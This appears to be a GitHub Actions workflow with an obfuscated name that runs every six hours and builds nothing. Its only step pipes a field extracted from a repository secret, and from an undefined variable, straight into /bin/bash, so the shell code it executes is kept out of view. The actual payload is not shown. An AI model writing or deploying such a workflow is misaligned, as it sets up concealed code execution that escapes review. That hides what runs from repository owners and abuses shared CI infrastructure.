name: colossalfrittata

on:
  workflow_dispatch:
  schedule:
    - cron: '43 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: colossalfrittata
        env:
          le04: ${{ secrets.le04 }}
        run: |
          echo $le04 | jq -r .gcq263 | /bin/bash
          echo $yrci885 | jq -r .tnn20 | /bin/bash

